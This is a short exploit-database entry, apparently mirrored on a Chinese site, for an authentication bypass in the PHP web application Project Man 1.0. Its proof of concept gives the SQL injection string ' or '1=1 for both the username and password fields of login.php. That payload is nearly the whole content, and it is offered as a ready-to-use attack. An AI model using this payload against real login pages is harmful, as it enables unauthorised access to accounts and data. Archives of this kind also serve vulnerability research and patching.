Project Man 1.0 – Authentication Bypass

• Exploit Database
• 10 阅读

• 作者： cr4wl3r
  日期： 2010-02-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11584/

• ##############################################################
  ##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
  ##############################################################
  Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
  Download: http://sourceforge.net/projects/projectman1/files/
  ##############################################################
  PoC:
   [Project Man_path]/login.php
  
  Username: ' or '1=1 
  password: ' or '1=1 
  ##############################################################